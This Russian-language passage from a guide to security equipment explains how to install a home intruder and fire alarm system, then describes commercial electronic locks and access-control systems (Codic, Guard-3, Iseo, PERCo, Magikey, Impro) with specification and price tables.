Предположим, что система охранно-пожарной сигнализации вами уже выбрана и приобретена в какой-либо торговой организации или фирме. В вашем распоряжении имеется контрольная панель, набор датчиков и исполнительных устройств. Количество необходимого соединительного провода вы должны определить самостоятельно. Для этого нужно определить места установки всех компонентов системы и с помощью рулетки замерить расстояние от контрольной панели до каждого элемента с учетом всех изгибов при прокладке кабеля. Сложив полученные значения вы определите общую длину соединительных проводов. Увеличив эту длину примерно на 10% (для учета непредвиденных затрат кабеля), вы определите то количество провода, которое необходимо приобрести. Наиболее часто при монтаже таких систем используют двухжильный телефонный провод типа ТРП. При его отсутствии можно использовать любой другой низковольтный провод.
Перед установкой сигнализации желательно провести проверку ее работоспособности. Магнитные датчики можно проверить любым тестером, датчики движения имеют встроенную систему контроля.
Монтаж системы следует начать с установки ее «мозга» — контрольной панели. Как правило, системы сигнализации включаются и выключаются поворотом специального ключа или путем набора определенного цифрового кода на контрольной панели (пульте управления). Поэтому контрольная панель должна устанавливаться в легко доступном, но незаметном месте, например под лестницей. Для ее питания и подзарядки аккумуляторов в месте установки контрольной панели необходимо предусмотреть наличие напряжения промышленной сети. Пример размещения контрольной панели (пульта), датчиков, исполнительных устройств и разводки соединительных проводов показан на рис. 1. 3.
Рис. 1. 3. Возможный вариант установки системы охранно-пожарной сигнализации:
1 — контрольная панель; 2 — пассивный ИК детектор; 3 — шлейф (фольга); 4 — магнитный датчик; 5 — стробоскоп; 6 — кнопка тревоги; 7 — сирена; 8 — прожектор; 9 — вибродатчик; 10 — фотоэлектрический датчик; 11 — видеокамера; 12 — видеоглазок; 13 — мультиплексор, или квадратор; 14 — монитор; 15 — пожарный извещатель
Магнитные датчики 4 на окна и двери устанавливаются следующим образом. Контакты датчика подключаются к проводу, а сам датчик устанавливается на коробке окна или косяке двери с помощью шурупов. Магнит закрепляется на оконной раме или полотне двери.
Шлейфы из фольги 3 устанавливаются на стеклах неоткрывающихся окон. Нанесение на стекло фольги на клейкой основе требует осторожности и некоторых навыков, т. к. малейшее изменение натяжения фольги толщиной 0, 008—0, 04 мм может привести к ее обрыву и операцию придется повторять заново. Для наклейки фольги нужно на несколько сантиметров снять защитную бумагу, немного натянуть фольгу и плотно прижать к стеклу. Фольгу нужно разгладить кусочком картона. Для изменения направления шлейфа в углах стекла нужно сначала отогнуть фольгу в обратную сторону (клейкой стороной наружу), а затем сделать загиб под углом 45° по отношению к первому.
Для установки клемм, необходимых для подключения фольги к проводному контуру сигнализации, нужно оставить свободные концы фольги длиной около 50 мм. Клеммы приклеиваются на границе стекла и рамы. Концы фольги складываются пополам и накладываются на клеммы, где и закрепляются пластиной и винтом. Для придания фольге особой хрупкости она покрывается специальным лаком. После установки клемм тестером нужно проверить целостность электрической цепи. Пассивный ИК детектор движения 2 устанавливается в углу помещения на высоте около 2 м. Детектор нельзя направлять на батареи отопления, окна и другие участки помещения, где возможен резкий перепад температур. Прибор крепится к стене с помощью специального кронштейна, входящего в комплект поставки или приобретаемого отдельно. Провода подключаются согласно прилагаемой схеме на прибор или систему. Такой детектор требует настройки для установки необходимой зоны охраны.
Кнопка тревоги 6 может быть врезной или накладной и обычно устанавливается в спальне или у входа в помещение в удобном для пользователя месте. Она нужна для того, чтобы вручную включить сирену, если система охраны не сработала по каким-либо причинам.
Сирену 7 можно установить как внутри, так и снаружи помещения. В первом случае она размещается в таком месте, где ее услышит любой, находящийся в доме. Во втором случае сирену нужно закрепить в труднодоступном для правонарушителей месте, например под крышей или на большой высоте. Там же может быть закреплен стробоскоп 5 или прожектор 8. При подключении этих исполнительных устройств нужно обязательно соблюдать полярность.
Скрытая телевизионная камера (видеоглазок) 12 монтируется на полотне входной двери так, чтобы обеспечить максимальный угол обзора околодверного пространства. Выходной зрачок камеры необходимо защитить, например, стеклом толщиной не менее 5 мм.
Телевизионные камеры наблюдения 11 устанавливаются на кронштейнах на высоте, затрудняющей доступ к ним, и в местах, обеспечивающих наилучший обзор охраняемой территории, например на углу здания. Так, при высоте установки ТВ камеры 2, 8 м, она может обеспечить обзор с углами по вертикали до 100° и по горизонтали до 80° на расстоянии до 20 м от камеры. Если необходимо обеспечить больший угол обзора, рекомендуется использовать поворотные устройства, скорость перемещения которых находится в переделах 0—12° в секунду. В этом случае при выбранном среднем расстоянии до объекта, например, 10м можно отслеживать перемещение предметов, движущихся со скоростью не более 2 м/с Мультиплексор (квадратор) 13 устанавливается в помещении рядом с монитором 14.
Охрана периметра, кроме телевизионной системы наблюдения, осуществляется с помощью фотоэлектрических датчиков 10. Эти датчики размещают вдоль ограждения (обычно по углам периметра) с таким расчетом, чтобы нельзя было перелезть или перепрыгнуть через ограждение и не пересечь при этом ИК луч. Защита ограждения от разрушения с целью проникновения на охраняемую территорию осуществляется с помощью вибродатчиков 9. Устанавливаются они согласно инструкции по монтажу.
Извещатели пожарной сигнализации 15, если они необходимы, лучше располагать между спальней и очагами возможного возгорания: гостиной, кухней, столовой. Для дополнительной защиты помещения эти приборы можно разместить и в других помещениях. Пожарные извещатели крепятся вдали от нагревательных приборов, вентиляционных отверстий и флуоресцентных ламп. В большинстве помещений они устанавливаются на потолке на расстоянии не менее 300 мм от стен и осветительных приборов. Настенные извещатели крепятся на расстоянии не менее 150—300 мм от потолка. На потолках с поперечными балками толщиной менее 100 мм они крепятся к основанию одной из них, а не между ними. Пожарные извещатели следует проверять не реже одного раза в месяц.
Прокладка соединительных проводов — это одна из наиболее трудоемких операций. Провода можно прокладывать везде, где это удобно, но не ближе 225 мм от силовых кабелей. Обычно провода прокладываются под плинтусом (или по нему), под ковровым покрытием, под полом и т. д. Двухжильный провод закрепляется специальными скобами или прибивается небольшими гвоздями с интервалом не более 300 мм.
Подключение контрольной панели требует скорее терпения и выдержки, чем специальных навыков. Большое количество проводов может вызвать некоторую растерянность и неуверенность в своих силах, что и приводит, как правило, к ошибкам в подключении. Выполняйте монтаж строго в соответствии с прилагаемой инструкцией и монтажной схемой, а в случае необходимости без стеснения обращайтесь к специалистам.
В следующих главах мы рассмотрим устройства и системы охраны отечественного и зарубежного производства, представленные на российском рынке. Вы познакомитесь с описанием и характеристиками электромеханических и-электронных замков, электронных устройств и систем контроля и ограничения доступа, различных систем охраны и наблюдения, а также извещателей, использующихся в них, систем видеонаблюдения, аудио- и видеодомофонов.
ГЛАВА 2.ЭЛЕКТРОННЫЕ ЗАМКИ И СИСТЕМЫ ОГРАНИЧЕНИЯ ДОСТУПА.
Электронные и электромеханические замки.
2. 1. 1. Электронно-механические замки системы Codic
Механика является неотъемлемой, а порой, и важнейшей частью любой охранной системы, которая должна обладать высокой надежностью, иметь современный дизайн и в то же время быть доступной по стоимости. Определяющим фактором при выборе замка должна быть не цена, а степень его защищенности и надежности. Для увеличения степени защиты механические замки объединяются с электронными устройствами набора кода или считывателями магнитных или электронных карточек и ключей. Для открывания двери с таким замком уже не достаточно наличия только ключа. Дверь открывается ключом только в случае правильного набора кода или после идентификации (т. е. определения правильности кода) магнитной или электронной карточки, поднесенной к замку или вставленной в соответствующее гнездо замка. Охранные системы немецкой фирмы Dorma, основанной более 80 лет назад, отвечают всем вышеперечисленным качествам. Они надежно защищают от несанкционированного доступа в помещения посторонних лиц и обеспечивают неприкосновенность и безопасность собственности и людей. Типичным представителем таких охранных систем является электронная система ограничения доступа Codic. Она включает в себя:
> устройства управления открыванием всех типов дверей;
> устройства блокировки аварийных выходов;
> устройства управления открыванием аварийных выходов в случае чрезвычайных ситуаций.
Для обеспечения высокой степени защищенности охраняемых помещений в электронных системах ограничения доступа Codic применяются электронно-
Рис. 2.1. Электронно-механические замки Codic
механические замки с повышенной секретностью управляющих кодов. Они снабжены устройствами автоматического контроля состояния дверей (открыты/закрыты), а также устройствами автоматического (аварийного) открывания дверей и устройствами оперативного управления замками дверей аварийного выхода в случае, например, пожара.
Система ограничения доступа Codic предлагает максимальную механическую защиту и высокую степень секретности электронного кода для ограничения доступа в дома и квартиры, административные здания и на промышленные предприятия. Эти изделия могут использоваться как индивидуально, так и в составе различных систем ограничения доступа. Внешний вид некоторых электронно-механических замков Codic, обеспечивающих надежную защиту охраняемых помещений, представлен на рис. 2. 1.
Электронно-механические замки используются для обеспечения защиты личной собственности, оборудования, информации от краж и вандализма. Они легко устанавливаются на любые двери.
В замках Codic электронно-механический блок защищен стальной пластиной, предотвращающей его взлом.
Управление электронно-механическим замком осуществляется при помощи вспомогательной клавишной панели — клавиатуры, для этого достаточно набрать определенный код (слово или номер) или вставить специальный ключ, выполненный в виде магнитной или электронной идентификационной карточки в считывающий блок. Считывающий блок (считыватель) производит считывание кода, введенного с карточки, и его идентификацию. Для увеличения безопасности для открывания замка можно совместить оба способа. Микропроцессор, вмонтированный внутрь считывателя, проверяет код и, если он соответствует коду, запрограммированному пользователем, т. е. идентичен, открывает электронно-механический замок. Использование определенной кодовой комбинации может быть изменено пользователем самостоятельно. Для этого достаточно перепрограммировать считыватель. Для повышения защищенности системы предусмотрено автономное питание, независимое от основного. Таким образом, отключение основного питания не нарушит выполнение функций системы и не понизит уровень безопасности. Кроме того, это облегчает установку системы, т. к. отпадет необходимость в прокладке кабеля питания.
Электронная система доступа Codic осуществляет контроль за состоянием запасных выходов и защиту от несанкционированного пользования ими, в тоже время обеспечивая быстрый и безопасный выход из здания в угрожающей ситуации. Благодаря сигнальному устройству, установленному рядом с дверью, любая попытка несанкционированного входа или выхода автоматически вызывает звуковой сигнал тревоги.
2. 1. 2. Электронный кодовый замок Guard-3
Электронный кодовый замок Guard-3 — это электромеханический замок с микропроцессорным управлением, обеспечивающий высокую степень защиты. Внешний вид замка представлен на рис. 2. 2. Замок обеспечивает надежное механическое запирание любой двери в трех направлениях стальными ригелями, приводимыми в движение встроенным микроэлектродвигателем. Такое запирание двери, при достаточной ее прочности, обеспечивает высокую устойчивость к взлому. Варианты крепления и установки замка на двери представлены на рис. 2. 3.
Надежность электроники обеспечивается исключительными свойствами конверсионных комплектующих элементов и отработанной в течение ряда лет оригинальной электронной схемой. В состав комплекта замка Guard-3 входят пять дистанционных кодовых ключей без источников питания, аналогичных по своему
устройству идентификационным карточкам ,описанных выше.Поскольку число возможных комбинаций кода составляет 4.5 млрд.,то подбор кода техническими
средствами практически невозможен.Кроме того ,при попытке подбора
кода срабатывает звуковая сигнализация.
Замок имеет встроенный резервный источник питания и электрозвонок. Все режимы работы замка, а также состояние источников питания индицируются
определенным звуковым сигналом. В системе управления замком предусмотрен
режим перепрограммирования — удаление из памяти замка кода утеренного ключа и ввод нового. На наружной части замка отсутствует традиционное отверстие под ключ (см. рис. 2.2, справа). Имеется возможность подключения к компьютеру для организации автоматической.регистрации всех входящих и выходящих с выдачей протокола в любой момент времени.
2.1.3. Кодовые замки фирмы Alarm Look.
Кодовые замки фирмы Alarm Look — это программируемые электронные
цифровые замки с тремя уровнями доступа, с автономным питанием электро-двигателя, предназначенного для управления задвижкой запроного устройства. Эти замки очень удобны для офисов, квартир, общежитий и т.д.
Установка нескольких замков Alarm Look в офисе с успехом заменяет сложную систему ограничения доступа, управляемую с помощью компьютера . Три разных уровня доступа позволяют управлять входом в различные помещения: :
> основной уровень позволяет открывать все замки в помещении и перепрограммировать их;
> служебный уровень позволяет пользоваться только частью помещений.
> пользовательский уровень — позволяет открывать только определенные замки. Замки имеют современный дизайн (рис. 2.4). Специальный замковый механизм позволяет проворачиваться внешней ручке на двери, не открывая замка,
что снижает нагрузку на электропривод типа Flex Drive. Замок открывается при повороте этой ручки только после ввода соответствующего кода. Кроме того, имеется. возможность открывания замка с внешней стороны при помощи ключа. Основные характеристики замков фирмы Alarm Look:
> высоконадежный замковый механизм;
> звуковая индикация о понижении напряжения питания;
> звуковая и световая индикация открывания двери;
> дистанционное управление замком;
^ защита от подбора кода;
> возможность использования в помещении и на улице;
> возможность параллельного открывания обычным ключом;
> программирование кодов доступа и функций системы.
Программирование кодов доступа и функций системы осуществляется при помощи цифровой клавиатуры, которая позволяет создать три уровня доступа:
основной (на все замки офиса) — один код или одна карточка, именуемая мастер-картой; служебный — один основной и 15 пользовательских кодов. Основной уровень позволяет открывать все двери (для всех дверей код общий), а также изменять пользовательские коды. На основном и служебном уровнях можно установить временной доступ длительностью от 5 до 20 с на все или какую-либо конкретную дверь. На этих же уровнях устанавливается код пользователя, действительный только для одноразового прохода, а также индивидуальный или групповой запрет прохода.
Кодовые замки фирмы Alarm Look рассчитаны для установки на двери толщиной от 3, 5 до 5, 5 см, правые или левые, открывающиеся наружу или внутрь, плоские или фигурные. Питание замка осуществляется от 5 алкалиновых батареек, которые обеспечивают 45000 циклов открывания. Цилиндрический замковый
Рис. 2. 4. Кодовые замки фирмы Alarm Look
механизм выполнен из антикоррозийного материала (закаленный металл холодной прокатки) и совместим с цилиндрическими замками типа Sclage, Arrow, Falcon, Unican/Simplox.
2.1.4. Электромеханические замки фирмы Iseo
Электромеханические дистанционно управляемые накладные и врезные замки итальянской фирмы Iseo могут устанавливаться на деревянные, пластиковые, стальные, алюминиевые двери различных типов, на решетки, калитки и ворота. Все врезные замки — универсальные, они имеют переворачиваемые ригели и могут устанавливаться на двери любых типов: открывающиеся внутрь или наружу, право- или левосторонние, оснащенные дверными доводчиками.
Электромеханические замки управляются дистанционно, путем подачи напряжения 12 В (15 Вт) постоянного или переменного тока, и могут быть использованы совместно с аудио- и видеодомофонами любых типов, кодовыми панелями, считывателями магнитных карт и электронных ключей, системами радиоуправления с миниатюрными радиобрелками и т. п. Замки применяются для построения «шлюзовых» систем из двух и более дверей, а также в любых других случаях, когда необходимо дистанционно открывать дверь.
Для открывания замка используется встроенный механизм с двухсторонним ключом (DK) или цилиндр. Цилиндры бывают стандартного (ST) и овального (SP) профиля. Все врезные замки имеют взводящий ригель и ригель-защелку, а также ригель-задвижку. Ригель-задвижка может быть выдвижной (в стандартных замках) или поворотной (в узких вертикальных замках). Замок типа 9639-00-90-0 имеет механизм трехточечного запирания (приводы для вертикальных ригелей). Для открывания ригеля-защелки изнутри без подачи напряжения на замок может устанавливаться механическая кнопка или ручка. Конструктивные особенности врезных замков приведены в табл. 2. 1, а внешний вид некоторых из них показан на рис. 2. 5.
Примечание: параметр Е указывает расстояние от края двери до центра цилиндра. Он особенно важен для узких вертикальных замков, которые удобны для алюминиевых, пластиковых и деревянных застекленных дверей.
Таблица 2. 1. Конструктивные особенности врезных замков фирмы Iseo
Тип замка |
Е, мм |
Тип цилиндра |
Тип ригеля-задвижки и количество |
Установка ручки |
550-60-1 |
60 |
SP |
Выдвижная, 1 |
+ |
791-25-1В |
25 |
ST |
Поворотная, 1 |
- |
791-35-1В |
35 |
ST |
Поворотная, 1 |
- |
9619-00-90-0 |
90 |
DK |
Выдвижная, 2 |
+ |
9639-00-90-0 |
90 |
DK |
Выдвижная, 2 |
+ |
Рис. 2. 5. Врезные электромеханические замки и цилиндры фирмы Iseo
Накладные замки фирмы Iseo, представленные на рынке, имеют стальной корпус, покрытый эмалью. На корпусе замка может размещаться внутренний цилиндр или механическая кнопка. При наличии внутреннего цилиндра механическая кнопка может быть заблокирована ключом или зафиксирована в нажатом состоянии (замок открыт).
Таблица 2. 2. Конструктивные особенности накладных замков
Обозначение (тип замка) |
Тип |
Внутренний цилиндр |
Внутренняя кнопка |
|
двери |
наружного цилиндра |
|||
511-50-5 |
1,2 |
VAR |
— |
+ |
5211-10-50-5 |
1 |
VAR |
— |
+ |
5211-20-50-5 |
2 |
VAR |
— |
+ |
5111-10-50-5 |
3 |
VAR |
— |
+ |
5111-20-50-5 |
4 |
VAR |
— |
+ |
5210-10-50-5 |
1 |
VAR |
+ |
— |
5210-20-50-5 |
2 |
VAR |
+ |
— |
5100-10-50-5 |
3 |
FIX |
+ |
— |
Окончание таблицы 2. 2
.Обозначение (тип замка) |
Тип |
Внутренний цилиндр |
Внутренняя кнопка |
|
двери |
наружного цилиндра |
|||
5100-20-50-5 |
4 |
FIX |
+ |
— |
5213-10-50-5 |
1 |
VAR |
+ |
+ |
5213-20-50-5 |
2 |
VAR |
+ |
+ |
5103-10-50-5 |
3 |
FIX |
+ |
+ |
5103-20-50-5 |
4 |
FIX |
+ |
+ |
5214-10-50-5 |
1 |
VAR |
+ |
— |
5214-20-50-5 |
2 |
VAR |
+ |
— |
5104-10-50-5 |
3 |
FIX |
+ |
— |
5104-20-50-5 |
4 |
FIX |
+ |
— |
Примечание: параметр «Тип двери» определяется конструкцией двери, для которой предназначен замок (рис. 2. 6).
Рис. 2. 6. Типы дверей
Наружный цилиндр может иметь фиксированную (FIX) или свободную (VAR) конструкцию. Цилиндр FIX жестко связан с корпусом замка и может устанавливаться на дверь толщиной до 50 мм. Цилиндр VAR связан с замком осью, длина которой может изменяться в больших пределах. Такой цилиндр может быть установлен на дверь толщиной до 85 мм. Конструктивные особенности накладных замков представлены в табл. 2.2, а внешний вид некоторых моделей — на рис. 2.7.
Замки могут комплектоваться цилиндрами повышенной степени секретности. Для управления электрозамками предназначены специальные блоки питания с регулируемым выходным напряжением в диапазоне от 7 до 18 В при токе 1,25 А. Это позволяет управлять замками различного типа на значительном расстоянии, используя при этом провод небольшого сечения. Для выполнения проводки питания к замку между косяком и дверным полотном пред-
Рис. 2. 7. Накладные электромеханические замки и цилиндры
назначены специальные пружинные контакты типа 050-060(Iseo),металлорукав
типа DLT 103/WH или гибкая теокопроводящая петля .Пружинные контакты ПОЗВОЛЯЮТ ПОЛНОСТЬЮ скрыть подводку питания к замку.
2.2. Электронные системы ограничения доступа
Надежно запертая и закрытая дверь — основа безопасности. Если это малопосещаемый кабинет, то хороший механический замок избавит вас от проблем. Однако при частом перемещении большого количества людей из одного помещения в другое постоянно приходится пользоваться ключами или запоминать несколько кодов и набирать их на клавиатуре, что чрезвычайно затрудняет поддержание режима безопасности на должном уровне. В таких случаях для обеспечения безопасности необходим автоматизированный контроль доступа. Эта мера позволяет предотвратить воровство, саботаж, промышленный шпионаж, умышленное повреждение имущества и создает барьер для любопытных.
Контроль доступа осуществляется с помощью электронных устройств, называемых системами ограничения доступа. Работа этих систем основана на использовании электронных, магнитных и других идентификационных карточек или ключей и считывателей, обеспечивающих высокий уровень секретности. Для участков, к которым предъявляются повышенные требования безопасности, считыватели дополнительно оснащаются электронными устройствами набора персонального кода. Эти системы позволяют осуществлять охранные функции, разграничение доступа в помещение по времени, регистрацию проходов сотрудников с указанием даты, времени и направления прохода. Предусматривается возможность формирования и контроля базы данных пользователей системы на персональном компьютере.
2.2.3. Модуль электронной проходной-регистратора комплекса «Менуэт»
Электронная проходная-регистратор предназначена для установки при входе на объект или в местах массового прохода персонала для пропуска его на объект и регистрации.
Устройство представляет собой специализированный контроллер, управление которым осуществляется компьютеризированным комплексом управления доступом "Менуэт".
Электронный регистратор позволяет по идентификационным карточкам автоматически контролировать посещаемость, выявлять опоздавших, не вышедших на работу лиц, производить учет рабочего времени. Этот же регистратор сообщает службе безопасности о лицах, не вышедших из здания по окончании рабочего дня, о нарушителях режима охраны, сохраняет информацию о посещении пользователями помещений.
Регистратор устанавливается на пути массового прохода персонала и выполняет следующие функции:
> разрешение прохода пользователям, имеющим зарегистрированные идентификационные карточки;
> автоматическую регистрацию пользователей с указанием даты, времени, направления прохода;
Рис. 2.12. Состав системы электронной проходной-регистратора и варианты ее применения
> централизованное разграничение доступа пользователей по спискам, ут вержденным администратором;
> - ведение протоколов несанкционированных действий пользователей с ука занием даты и времени нарушений;
> управление электромеханическим замком или турникетом;
> организация проходов в тамбур-шлюзах.
Состав системы электронной проходной-регистратора и варианты ее применения показаны на рис. 2. 12.
Регистратор может работать в автономном режиме, без компьютера, накапливая данные в своей памяти. При включении компьютера и загрузке программного обеспечения данные из памяти регистратора автоматически считываются в память компьютера для последующей обработки.
При функционировании системы под управлением компьютера информация о проходе персонала передается и обрабатывается в реальном масштабе времени. При этом на экран монитора администратора безопасности выводится информация о проходящем сотруднике.
Регистратор можно использовать в четырех вариантах: в виде двух миниатюрных считывателей; в виде электронного дверного замка; в виде проходной с турникетом или тамбур-шлюза.
2.2.4. Системы контроля доступа серии PERCo-MS-1000
Системы контроля доступа серии PERCo-MS-1000 с использованием пластиковых карточек вместо ключей и пропусков предназначены для решения задач обеспечения безопасности и дисциплины. Системы этой серии являются оптимальным выбором, если задачи рациональной организации труда выходят за рамки простого ограничения доступа и необходимо:
> определить для сотрудников не только помещения, в которые разрешен доступ, но и время, в которое этот доступ можно осуществить;
> иметь информацию о том, что происходит в помещениях или на территории;
> обеспечить выполнение охранных функций.
Системы эффективны при установке на входе в различные учреждения, начиная с оборудования наружной двери небольшого офиса и до оснащения проходной предприятия. Они устанавливаются также на двери кабинетов и других внутренних помещений офисов, банков, учреждений, предприятий.
При оборудовании входных дверей и проходных особого внимания заслуживает то, что, помимо защиты от посторонних, имеется возможность контроля за соблюдением трудовой дисциплины.
При установке на дверях кабинетов и других внутренних помещений, помимо удобства пользования и престижного внешнего вида, большое значение приобретает возможность постановки помещения на охрану с помощью карточки и получение информации о последних событиях (например, кто последним входил в данное помещение, ставил/снимал его с охраны и т. д.).
При оборудовании системами серии 1000 нескольких объектов сотрудники могут проходить на различные объекты, используя одну и ту же карту.
Характеристика систем серии 1000
Любая система серии 1000 имеет возможность подключения к персональному компьютеру (ПК), что упрощает работу с ней и предоставляет пользователю дополнительные возможности. При оснащении нескольких помещений системами серии 1000 можно объединить системы в сеть, подключив их к одному компьютеру (рис. 2. 13).
Следует отметить, что все возможности систем по разграничению доступа и выполнению охранных функций могут быть реализованы и без ПК. Это чрезвычайно удобно в случаях, когда компьютер расположен далеко или не предполагается к использованию в целях контроля доступа.
Кроме того, достоинствами систем серии 1000 являются:
> широкий выбор моделей, различных по цене, что позволяет оптимизировать затраты на оборудование объекта;
> легкость и низкая стоимость монтажа систем;
> простота демонтажа и переустановки систем при переезде или изменении
назначения помещения.
В качестве исполнительных устройств в системах серии PERCo-MS-1000 используются электромеханические замки, турникеты, ворота, шлагбаумы и т. п. При организации линий контроля в качестве исполнительных устройств используются различные датчики.
Для идентификации пользователей используются бесконтактные или магнитные карты доступа.
Системы решают следующие задачи.
1. Разграничение доступа на объект:
> список сотрудников, имеющих право доступа на объект, устанавливается и может быть оперативно изменен ответственным лицом;
> имеется возможность указать, в какое именно время сотруднику разрешено входить в помещение или на территорию предприятия;
> для руководителей, ответственных лиц и охраны может быть разрешен проход в любое время («свободный доступ»);
> все события, в том числе входы/выходы сотрудников, запоминаются системой. Впоследствии эта информация может быть просмотрена, например, с целью контроля за соблюдением дисциплины (кто, когда пришел/ушел и пр.).
2. Охрана.
> в системах имеется специальный режим «Охрана». Ставить с помощью карточек помещение на охрану, снимать его с охраны могут только сотрудники с определенным уровнем доступа. Это позволяет
Рис. 2.13. Система контроля доступа серии PERCo-MS-1000
> разделить персонал на две (по уровню предоставляемого доступа) иерархические группы;
> в режиме «Охрана» в случае нештатных ситуаций система выдает сигнал тревоги;
> все тревоги, факты постановки/снятия помещения с охраны запоминаются системой и впоследствии могут быть просмотрены. Это позволяет осуществлять контроль в целях обеспечения безопасности.
Выбор модели системы серии PERCo-MS-1000
Система PERCo-MS-1103KD необходима для осуществления полного контроля за доступом в помещения с получением информации о том, кто и когда в него входил и выходил, без использования компьютера.
Контроллер этой модели имеет клавиатуру и дисплей, которые удобно использовать для занесения в систему и последующей корректировки списков сотрудников, имеющих право доступа в помещение, а также для просмотра информации о последних событиях. Системой можно оборудовать одну дверь с контролем входа или входа/выхода либо две двери с контролем входа. Система оснащена встроенными сиреной и аккумулятором. При необходимости ее можно подключить к компьютеру и объединить с другими системами серии 1000.
Применение системы PERCo-MS-1102 со встроенными аккумулятором и сиреной, но без клавиатуры и дисплея, является более дешевым вариантом при тех же функциональных возможностях, если планируется сразу подключить систему к компьютеру или объединить несколько систем в сеть.
PERCo-MS-1101 является еще более оптимальным и дешевым вариантом, если нет опасности пропадания сетевого питания и не нужна встроенная сирена.
PERCo-MS-1203KD с клавиатурой и дисплеем необходима для оборудования проходной с турникетом и организации контроля за перемещением персонала без использования компьютера. Эта универсальная мощная система также позволяет управлять шлагбаумом, воротами и другими исполнительными механизмами. При необходимости ее можно подключить к компьютеру и объединить в сеть с другими системами серии 1000.
Применение модели PERCo-MS-1201 без клавиатуры и дисплея будет более дешевым вариантом, если планируется сразу подключить систему к компьютеру или объединить в сеть с другими системами серии 1000.
Объединение систем серии PERCo-MS-1000
Для обеспечения дополнительного удобства эксплуатации систем контроля доступа серии 1000, их можно объединить в сеть, подключив к одному компьютеру.
Объединение систем предоставляет дополнительные возможности:
> централизованно формировать и редактировать списки сотрудников для каждого объекта;
> централизованно изменять установки систем, например время звучания сирены;
> - централизованно изменять режимы работы объектов, например ставить/снимать помещения с охраны.
Особенно это важно в случае, если на предприятии большое число объектов оборудовано такими системами.
К достоинствам объединения систем серии PERCo-MS-1000 в сеть следует отнести:
> единый принцип работы с системами различных моделей;
> легкость добавления к сети новых систем и увеличения числа контролируемых объектов;
> простое в использовании рускоязычное программное обеспечение.
Все это позволяет создавать и совершенствовать систему управления доступом, отвечающую потребностям конкретной организации.
2.2.5. Электронная система ограничения доступа Magikey
Электронная система ограничения доступа Magikey известной итальянской фирмы Urmet Domus S. p. A. позволяет ограничивать доступ в помещения офиса, предприятия, в жилое помещение. Она позволяет управлять одним и более электромеханическими замками без использования механических ключей. Для открытия дверей используется идентификационный электронный ключ или карточка, которые прикладываются к наружной панели считывателя.
Рис. 2. 14. Комплект оборудования Magickey, совмещенный с домофонной системой.
Рис.2.15. Варианты использования системы Magickey
Система состоит из следующих элементов: считывателя, модуля управления, блока питания и электромеханического замка
Устройство Magikey может использоваться совместно с аудио- или видео-домофонной системой ограничения доступа. Модуль управления может работать с четырьмя наружными считывателями и четырьмя замками. В памяти модуля управления хранится до 511 кодов ключей. Комплект оборудования Magickey, совмещенный с домофонной системой, представлен на рис. 2. 14, а варианты
использования системы — на рис. 2. 15.
Фирма-производитель гарантирует качество этого оборудования в соответствии
со стандартом ЕЭС и национальным стандартом Италии, а также соответствие стандартам Российской Федерации.
2.2.6. Бесконтактные системы ограничения доступа фирмы Impro Technologies
Приборы и устройства фирмы Impro Technologies (ЮАР) служат для создания бесконтактных систем ограничения доступа различной сложности. Для автоматического управления исполнительным механизмом (электрозащелкой, электрозамком, турникетом, шлагбаумом и т. п.) в приборах предусмотрен силовой выход на который при приближении к считывателю специального зарегистрированного кодового ключа, выполненного в виде жетона (рис. 2. 16) или пластиковой карточки, подается управляющее напряжение.
Принцип работы считывателя заключается в следующем. Он непрерывно излучает электромагнитные колебания, которые наводят ЭДС в катушке кодового ключа. Благодаря этому обеспечивается питание встроенной в ключ микросхемы, которая, в свою очередь, по определенному закону оказывает воздействие на излучаемое считывателем поле.
Кодовая последовательность, идентифицируемая считывателем, индивидуальна для каждого кодового ключа и имеет одну из 34 млрд. возможных комбинаций, что практически исключает ее подбор. Кодовые комбинации устанавливаются на заводе-изготовителе. Кодовый ключ имеет ударопрочный герметичный корпус с неограниченным сроком службы.
Рис. 2.16. Внешний вид считывателей и жетонов фирмы Impro Technologies
-Таким образом, если в памяти считывателя хранится код определенного кодового ключа, то при приближении последнего к считывателю код идентифицируется, что дает возможность владельцу этого ключа пройти через соответствующую дверь, проходную и т.п.
Кодовые ключи фирмы Impro Technologies выпускаются двух типов: круглый в виде жетона и в форме кредитной карточки. Они обладают уникальной совместимостью: один и тот же ключ может использоваться для разрешения прохода в помещениях, офисах, квартирах, дачах и т. д., оборудованных различными типами считывателей фирмы Impro Technologies.
С помощью описанной выше технологии можно организовать ограничение доступа не только для людей, но и для транспортных средств. Это достигается с помощью специальных кодовых ключей:
> VTP01RU078 — ключ с кнопкой, предназначенный для открывания ворот, шлагбаумов и т. п.;
> VTP02RU078 — ключ, монтируемый на автомобиле (питание+ 12 В);
> VTP03RU078 — ключ, монтируемый на автомобиле (питание+ 24 В);
> VTP04RU100 — ключ, монтируемый на автомобиле (питание+ 12... 24 В).
Так как считыватель излучает электромагнитные колебания, то он может быть установлен на внутренней поверхности стены, чем достигается скрытность системы и ее защищенность. Стена может быть выполнена из любого строительного материала, кроме металла. В случае, если стена, за которой устанавливается считыватель, оказывается слишком толстой или изготовлена из металла (содержит металлическую арматуру), считыватель может быть вынесен наружу на расстояние до 25 м от основного блока. Разновидности считывателей и их особенности приведены в табл. 2. 3.
Ввод и регистрация новых ключей и карточек, а также исключение их из списка осуществляется с помощью специальной мастер-карты. При подключении к считывателю принтера можно распечатать массив зарегистрированных
Таблица 2.3. Разновидности считывателей жетонов и их особенности
Тип считывателя |
Технические характеристики |
RIN01RU100 |
Считыватель в стандартном корпусе |
RMR01RU100 |
Считыватель во всепогодном, вандалостойком корпусе |
RPC01RU100 |
Считыватель в брызгозащитном, вандалостойком корпусе |
RPU01RU100 |
Считыватель в водозащитном, вандалостойком корпусе (с блоком настройки RPU02RU) |
RPU02RU |
Блок настройки для RPU01RU100 |
RWG01RL100 |
Считыватель в декоративном корпусе (под дерево) |
RDT01RU100 |
Считыватель с индикацией времени и даты |
RIR40RU100 |
Считыватель для установки в стандартной соединительной коробке диаметром 40 мм |
RIRSORU100 |
Считыватель для установки в стандартной соединительной коробке диаметром 50 мм |
кодов, а также список кодов, по которым осуществлялся проход в последнее время. Подключение к считывателю компьютера упрощает редактирование кодов ключей, а также позволяет осуществлять контроль конкретной двери с указанием даты и времени прохода.
Фирма Impro Technologies выпускает несколько разновидностей бесконтактных систем доступа. Состав этих систем и их назначение приведены в табл. 2. 4.
Таблица 2. 4. Бесконтактные системы ограничения доступа фирмы Impro Technologies
Тип системы |
Технические характеристики |
Цена, USD |
FLEX-SCANCLASSC |
||
FSC01RU100 |
Считывание до 20 жетонов к управление одной дверью в одном направлении |
289 |
FSC02RU100 |
Считывание до 200 жетонов и управление одной дверью в одном направлении |
329 |
